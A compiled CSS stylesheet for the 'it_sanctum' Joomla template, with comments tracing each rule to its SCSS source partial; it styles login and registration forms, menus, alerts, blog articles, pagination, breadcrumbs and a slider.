/* line 25, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
#login-form #form-login-remember input {
  margin: 0 5px 0 0;
}
/* line 29, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
#login-form ul.unstyled {
  margin: 20px 0 0;
}
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
#login-form ul.unstyled a {
  color: #282828;
}
/* line 33, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
#login-form ul.unstyled a:hover {
  color: #4f953b;
}
/* line 36, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
#login-form ul.unstyled a i {
  margin-right: 7px;
}
/* line 44, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 45, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu {
  margin: 0;
}
/* line 47, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li {
  margin-bottom: 6.5px;
}
/* line 49, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li:last-child {
  margin-bottom: 0;
}
/* line 52, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li a {
  color: #282828;
}
/* line 54, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li a:before {
  content: "\f105";
  font-family: FontAwesome;
  margin-right: 0.625rem;
}
/* line 59, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li a:hover {
  color: #4f953b;
}
/* line 63, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 64, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li span:before {
  content: "\f105";
  font-family: FontAwesome;
  margin-right: 0.625rem;
}
/* line 70, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li ul {
  margin-top: 6.5px;
  margin-bottom: 6.5px;
}
/* line 74, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 75, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li.current > a, .nav.menu li.current > span {
  color: #4f953b;
}
/* line 84, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.well {
  background: transparent;
  border: 1px solid #ddd;
  border-radius: 0;
  box-shadow: none;
  padding: 30px 30px 10px;
}
/* line 93, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 94, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 95, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 96, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 97, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.login > form fieldset .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
/* line 101, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.login > form fieldset .control-group #remember {
  margin-top: 10px;
}
@media only all and (max-width: 47.938rem) {
  .login > form fieldset .control-group #remember {
    width: auto;
  }
}
/* line 107, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
@media only all and (max-width: 47.938rem) {
  .login > form fieldset .control-group input {
    width: 100%;
  }
}
/* line 117, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 118, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.logout .controls {
  margin-left: 0;
}
/* line 123, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 124, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 125, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
ul.nav-tabs.nav-stacked > li > a {
  border-radius: 0 !important;
  border: 1px solid #ddd;
}
/* line 128, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
ul.nav-tabs.nav-stacked > li > a:hover {
  border: 1px solid #ddd;
}
/* line 136, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 137, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.registration #member-registration {
  margin-bottom: 0;
}
/* line 139, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.registration #member-registration legend + .control-group {
  margin-top: 0;
}
/* line 142, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 143, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.registration #member-registration .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
/* line 147, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
@media only all and (max-width: 47.938rem) {
  .registration #member-registration .control-group input {
    width: 100%;
  }
}
/* line 157, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 158, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.remind #user-registration, .reset #user-registration {
  margin-bottom: 0;
}
/* line 160, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 161, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.remind #user-registration fieldset p, .reset #user-registration fieldset p {
  margin-top: 0;
}
/* line 165, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 166, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.remind #user-registration .control-group .control-label, .reset #user-registration .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
/* line 175, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 176, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile > ul.btn-toolbar {
  margin-top: 0;
}
/* line 179, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile #users-profile-core {
  margin-bottom: 20px;
}
/* line 182, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 183, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 184, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile fieldset dl dt {
  text-align: left;
}
/* line 192, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 193, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile-edit #member-profile {
  margin-bottom: 0;
}
/* line 195, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 196, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile-edit #member-profile .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
/* line 200, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile-edit #member-profile .control-group .chzn-container {
  padding-top: 8px;
}
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-striped, .row-striped {
  border-top: 1px solid #ddd;
}
/* line 7, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-striped li, .list-striped dd, .row-striped .row, .row-striped .row-fluid {
  border-bottom: 1px solid #ddd;
}
/* line 14, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-striped li:nth-child(odd), .list-striped dd:nth-child(odd), .row-striped .row:nth-child(odd), .row-striped .row-fluid:nth-child(odd) {
  background-color: #fcfcfc;
}
/* line 21, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-striped li:hover, .list-striped dd:hover, .row-striped .row:hover, .row-striped .row-fluid:hover {
  background-color: #f2f2f2;
}
/* line 28, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-bordered, .row-bordered {
  border: 1px solid #ddd;
}
/* line 33, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.row-even, .row-odd {
  border-bottom: 1px solid #ddd;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.row-even {
  background-color: #fcfcfc;
}
/* line 42, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.iframe-bordered {
  border: 1px solid #ddd;
}
/* line 47, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
blockquote {
  border-left: 5px solid #ddd;
}
/* line 52, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
blockquote small {
  color: #c8c8c8;
}
/* line 56, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
blockquote.pull-right {
  border-right: 5px solid #ddd;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
legend {
  color: #333;
}
/* line 5, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
legend small {
  color: #999;
}
/* line 9, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
.input-prepend .chzn-container-single .chzn-single, .input-append .chzn-container-single .chzn-single {
  border-color: #ddd;
}
/* line 14, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
.input-prepend .chzn-container-single .chzn-drop, .input-append .chzn-container-single .chzn-drop {
  border-color: #ddd;
}
/* line 19, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
textarea, input[type="text"], input[type="password"], input[type="datetime"], input[type="datetime-local"], input[type="date"], input[type="month"], input[type="time"], input[type="week"], input[type="number"], input[type="email"], input[type="url"], input[type="search"], input[type="tel"], input[type="color"], .uneditable-input {
  background-color: #fff;
  border: 1px solid #d5d5d5;
  box-shadow: none;
  padding: 10px;
  border-radius: 0;
  -webkit-transition: border 0.2s linear, box-shadow 0.2s linear;
  -moz-transition: border 0.2s linear, box-shadow 0.2s linear;
  transition: border 0.2s linear, box-shadow 0.2s linear;
}
/* line 41, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
textarea:focus, input[type="text"]:focus, input[type="password"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="date"]:focus, input[type="month"]:focus, input[type="time"]:focus, input[type="week"]:focus, input[type="number"]:focus, input[type="email"]:focus, input[type="url"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="color"]:focus, .uneditable-input:focus {
  box-shadow: none;
}
/* line 46, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
/* line 47, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
#g-aside input, #g-sidebar input, #g-offcanvas input, #g-aside textarea, #g-sidebar textarea, #g-offcanvas textarea, #g-aside .uneditable-input, #g-sidebar .uneditable-input, #g-offcanvas .uneditable-input {
  width: 100%;
}
/* line 50, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
#g-aside input[type="file"], #g-sidebar input[type="file"], #g-offcanvas input[type="file"], #g-aside input[type="image"], #g-sidebar input[type="image"], #g-offcanvas input[type="image"], #g-aside input[type="submit"], #g-sidebar input[type="submit"], #g-offcanvas input[type="submit"], #g-aside input[type="reset"], #g-sidebar input[type="reset"], #g-offcanvas input[type="reset"], #g-aside input[type="button"], #g-sidebar input[type="button"], #g-offcanvas input[type="button"], #g-aside input[type="radio"], #g-sidebar input[type="radio"], #g-offcanvas input[type="radio"], #g-aside input[type="checkbox"], #g-sidebar input[type="checkbox"], #g-offcanvas input[type="checkbox"] {
  width: auto;
}
/* line 55, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
/* line 56, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
/* line 57, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
#g-header .search form, #g-navigation .search form {
  margin-bottom: 0;
}
/* line 60, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
#g-header .search input, #g-navigation .search input {
  margin-bottom: 0;
  border: 0;
}
/* line 68, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
/* line 69, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
.view-mailto #g-page-surround, .body-only #g-page-surround {
  box-shadow: none;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_tabs.scss */
.nav-tabs.nav-dark {
  border-bottom: 1px solid #333;
  text-shadow: 1px 1px 1px #000;
}
/* line 6, templates/it_sanctum/scss/sanctum-joomla/_tabs.scss */
.nav-tabs.nav-dark > li > a {
  color: #f8f8f8;
}
/* line 10, templates/it_sanctum/scss/sanctum-joomla/_tabs.scss */
.nav-tabs.nav-dark > li > a:hover {
  border-color: #333 #333 #111;
  background-color: #777;
}
/* line 15, templates/it_sanctum/scss/sanctum-joomla/_tabs.scss */
.nav-tabs.nav-dark > .active > a, .nav-tabs.nav-dark > .active > a:hover {
  color: #fff;
  background-color: #555;
  border: 1px solid #222;
}
/* line 3, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.tip-wrap {
  color: #fff;
  background-color: #000;
}
/* line 9, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.search span.highlight {
  background-color: #fcfcfc;
}
/* line 14, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.img-polaroid {
  background-color: #fff;
  border: 1px solid rgba(0, 0, 0, 0.2);
  box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
}
/* line 21, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.muted {
  color: #999;
}
/* line 25, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.muted:hover, a.muted:focus {
  color: #808080;
}
/* line 30, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert {
  background-color: #f8f4ec;
  border-color: #eee4d2;
}
/* line 34, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert a, .alert a:hover, .alert .alert-link, .alert .alert-link:hover {
  color: #a47e3c;
  font-weight: bold;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert a:hover, .alert a:hover:hover, .alert .alert-link:hover, .alert .alert-link:hover:hover {
  text-decoration: underline;
}
/* line 44, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert, .text-warning {
  color: #c09853;
}
/* line 49, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert h4 {
  color: #c09853 !important;
}
/* line 53, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.text-warning:hover, a.text-warning:focus {
  color: #b78c43;
}
/* line 58, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-success {
  color: #468847;
  background-color: #dfeedf;
  border-color: #c4e0c4;
}
/* line 63, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-success a, .alert-success a:hover, .alert-success .alert-link, .alert-success .alert-link:hover {
  color: #356635;
  font-weight: bold;
}
/* line 67, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-success a:hover, .alert-success a:hover:hover, .alert-success .alert-link:hover, .alert-success .alert-link:hover:hover {
  text-decoration: underline;
}
/* line 73, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.text-success {
  color: #468847;
}
/* line 77, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-success h4 {
  color: #468847 !important;
}
/* line 81, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.text-success:hover, a.text-success:focus {
  color: #3d773e;
}
/* line 86, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-danger, .alert-error {
  color: #b94a48;
  background-color: #f6e7e7;
  border-color: #edd1d0;
}
/* line 92, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-danger a, .alert-error a, .alert-danger a:hover, .alert-error a:hover, .alert-danger .alert-link, .alert-error .alert-link, .alert-danger .alert-link:hover, .alert-error .alert-link:hover {
  color: #953b39;
  font-weight: bold;
}
/* line 96, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-danger a:hover, .alert-error a:hover, .alert-danger a:hover:hover, .alert-error a:hover:hover, .alert-danger .alert-link:hover, .alert-error .alert-link:hover, .alert-danger .alert-link:hover:hover, .alert-error .alert-link:hover:hover {
  text-decoration: underline;
}
/* line 102, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.text-error {
  color: #b94a48;
}
/* line 106, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-danger h4, .alert-error h4 {
  color: #b94a48 !important;
}
/* line 111, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.text-error:hover, a.text-error:focus {
  color: #a74240;
}
/* line 116, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-info {
  color: #3a87ad;
  background-color: #e2eff5;
  border-color: #c7e0ec;
}
/* line 121, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-info a, .alert-info a:hover, .alert-info .alert-link, .alert-info .alert-link:hover {
  color: #2d6987;
  font-weight: bold;
}
/* line 125, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-info a:hover, .alert-info a:hover:hover, .alert-info .alert-link:hover, .alert-info .alert-link:hover:hover {
  text-decoration: underline;
}
/* line 131, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.text-info {
  color: #3a87ad;
}
/* line 135, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert-info h4 {
  color: #3a87ad !important;
}
/* line 139, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.text-info:hover, a.text-info:focus {
  color: #34789a;
}
/* line 145, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.platform-content input {
  box-sizing: inherit;
}
/* line 150, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.form-actions {
  background-color: transparent;
  border: none;
  margin: 0;
  padding: 0;
}
/* line 158, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.element-invisible {
  border: 0 none;
  height: 1px;
  margin: 0;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact > h3 {
  display: none;
}
/* line 5, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact .contact-address {
  margin: 0;
}
/* line 8, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form {
  margin-bottom: 0;
}
/* line 10, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
/* line 11, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form fieldset > legend {
  font-size: 0.9rem;
  color: #282828;
  margin-bottom: 0;
}
/* line 17, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
/* line 18, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form.form-horizontal .control-label {
  text-align: left;
}
/* line 22, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form input, .contact #contact-form textarea {
  width: 100%;
}
@media only all and (max-width: 47.938rem) {
  .contact #contact-form input, .contact #contact-form textarea {
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .contact #contact-form input, .contact #contact-form textarea {
    width: 100%;
  }
}
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form #jform_contact_email_copy {
  width: 10px;
}
/* line 34, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form label {
  margin-top: 3px;
}
/* line 37, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form #jform_contact_email_copy-lbl {
  margin-top: 0;
}
/* line 40, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
@media only all and (max-width: 47.938rem) {
  .contact #contact-form .form-actions {
    padding: 0;
  }
  /* line 43, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
  .contact #contact-form .form-actions > button {
    display: block;
    width: 100%;
  }
}
/* line 49, templates/it_sanctum/scss/sanctum-joomla/_contacts.scss */
.contact #contact-form.well {
  border: none;
  padding: 0;
  background: none;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb {
  margin: 6px 0 0;
  padding: 0;
  background: none;
  text-align: center;
}
@media only all and (max-width: 47.938rem) {
  ul.breadcrumb {
    margin: 0;
  }
}
/* line 9, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb li {
  text-shadow: none;
}
/* line 11, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb li .divider {
  display: none;
}
/* line 14, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 15, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb li + li:after {
  content: "/ ";
  padding: 0 5px;
}
/* line 19, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 20, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
ul.breadcrumb li + li:last-child:after {
  content: none;
  padding: 0;
}
/* line 29, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 30, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 32, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
@media only all and (max-width: 47.938rem) {
  .g-grid > .g-block:last-child ul.breadcrumb {
    text-align: center;
  }
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
/* line 39, templates/it_sanctum/scss/sanctum-joomla/_breadcrumb.scss */
@media only all and (max-width: 47.938rem) {
  .g-grid > .g-block:first-child ul.breadcrumb {
    text-align: center;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.blog .category-desc, .blog-featured .category-desc {
  margin: -10px 0 30px;
}
/* line 6, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 7, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.blog .items-more ol, .blog-featured .items-more ol {
  padding-left: 0;
  margin: 0 0 60px 0;
}
/* line 12, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 13, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.blog article.item, .blog-featured article.item {
  margin-bottom: 60px;
}
/* line 19, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 20, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.item-page ul.pager {
  margin-bottom: 0;
}
/* line 25, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 26, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
article .item-image {
  margin: 20px 0;
}
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 32, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 33, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tag-category li h3 {
  margin: 10px 0;
}
/* line 35, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tag-category li h3 a {
  color: #282828;
}
/* line 37, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tag-category li h3 a:hover {
  color: #4f953b;
}
/* line 43, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tag-category form {
  margin-bottom: 0;
}
/* line 48, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header {
  position: relative;
  padding: 0;
}
/* line 51, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons {
  position: relative;
  right: 0;
  top: 32px;
  right: 15px;
}
/* line 56, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 57, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons .btn-group .btn {
  background: transparent !important;
  border: 0px solid #fff !important;
  padding: 0.3rem 0.6rem !important;
}
/* line 61, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons .btn-group .btn [class^="icon-"], .g-article-header > .icons .btn-group .btn [class*=" icon-"] {
  color: #959595 !important;
  margin-right: 0px;
}
@media only all and (max-width: 47.938rem) {
  .g-article-header > .icons .btn-group .btn [class^="icon-"], .g-article-header > .icons .btn-group .btn [class*=" icon-"] {
    margin-top: 5px;
  }
}
/* line 68, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons .btn-group .btn .caret {
  display: none;
}
/* line 71, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header > .icons .btn-group .btn:hover {
  color: #4f953b !important;
}
/* line 77, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 78, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header .page-header h2 {
  margin: 0 0 -10px 0;
}
/* line 80, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header .page-header h2 a {
  color: #282828;
}
/* line 82, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.g-article-header .page-header h2 a:hover {
  color: #4f953b;
}
/* line 90, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.readmore {
  margin: 0;
}
/* line 92, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 93, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.readmore .btn span {
  display: none;
}
/* line 99, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.tags {
  margin-bottom: 1.5rem;
}
/* line 103, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info {
  color: #959595;
  margin: 20px 0 0;
  background: transparent;
  border: 1px solid #ddd;
  padding: 1rem 1.5rem;
}
/* line 109, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info a {
  color: #959595;
}
/* line 112, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info .article-info-term {
  display: none;
}
/* line 115, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info dd {
  display: inline-block;
  margin: 0 20px 0 0;
}
/* line 118, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.article-info dd i {
  margin-right: 5px;
}
@media only all and (max-width: 47.938rem) {
  .article-info {
    text-align: center;
  }
}
/* line 127, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 128, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.content-category form {
  margin-bottom: 0;
}
/* line 131, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.content-category .pagination {
  margin-bottom: 0;
}
/* line 133, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.content-category .pagination > ul {
  margin-bottom: 0;
  box-shadow: none;
}
/* line 137, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.content-category .pagination .counter {
  margin-bottom: 0;
}
@media only all and (max-width: 47.938rem) {
  .content-category .pagination .counter {
    float: none;
  }
}
/* line 146, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination {
  margin: 0;
}
/* line 148, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination ul {
  margin: 0;
  box-shadow: none;
}
/* line 151, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 152, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination ul > li > a, .pagination ul > li > span {
  color: inherit;
  padding: 0.675rem 1rem;
  margin-right: 5px;
  border: 1px solid #ddd;
  border-radius: 0px !important;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
/* line 159, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination ul > li > a:hover, .pagination ul > li > span:hover {
  color: #fff;
  background: #4f953b;
  border-color: #4f953b;
}
/* line 166, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 167, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination ul > .active > a, .pagination ul > .active > span {
  color: #fff;
  background: #4f953b;
  border-color: #4f953b;
}
/* line 174, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pagination .counter {
  margin: 7px 0 0;
}
@media only all and (max-width: 47.938rem) {
  .pagination .counter {
    float: none;
  }
}
/* line 182, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 183, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
/* line 184, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pager li a {
  color: inherit;
  border: 1px solid inherit;
  background: transparent;
  border-radius: 0px;
  padding: 0.675rem 1.5rem;
}
/* line 190, templates/it_sanctum/scss/sanctum-joomla/_blog.scss */
.pager li a:hover {
  color: #fff;
  background: #4f953b;
  border-color: #4f953b;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
/* line 3, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
/* line 4, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tp-caption a.button {
  color: #fff;
}
/* line 6, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tp-caption a.button.dark {
  margin-left: 10px;
}
/* line 13, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows:before {
  color: #fff;
  display: inline-block;
  font-family: FontAwesome, sans-serif;
  font-size: 20px;
  font-style: normal;
  font-weight: bold;
  margin-right: 0;
  margin-top: 2px;
  text-align: center;
  text-decoration: inherit;
  width: 35px;
}
/* line 26, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows {
  background: #000;
  background: none repeat scroll 0 0 rgba(0, 0, 0, 0.4);
  border-radius: 5px;
  cursor: pointer;
  height: 35px;
  width: 35px;
  -webkit-transition: background 0.3s, opacity 0.3s;
  -moz-transition: background 0.3s, opacity 0.3s;
  transition: background 0.3s, opacity 0.3s;
}
/* line 35, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows:hover {
  color: #fff;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tp-leftarrow:before {
  content: "\f104";
}
/* line 41, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tp-rightarrow:before {
  content: "\f105";
}
/* line 44, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows.tp-rightarrow:before {
  margin-left: 1px;
}
/* line 47, templates/it_sanctum/scss/sanctum-joomla/_revolution.scss */
.rev_slider_wrapper .tparrows:hover {
  background: #000;
}
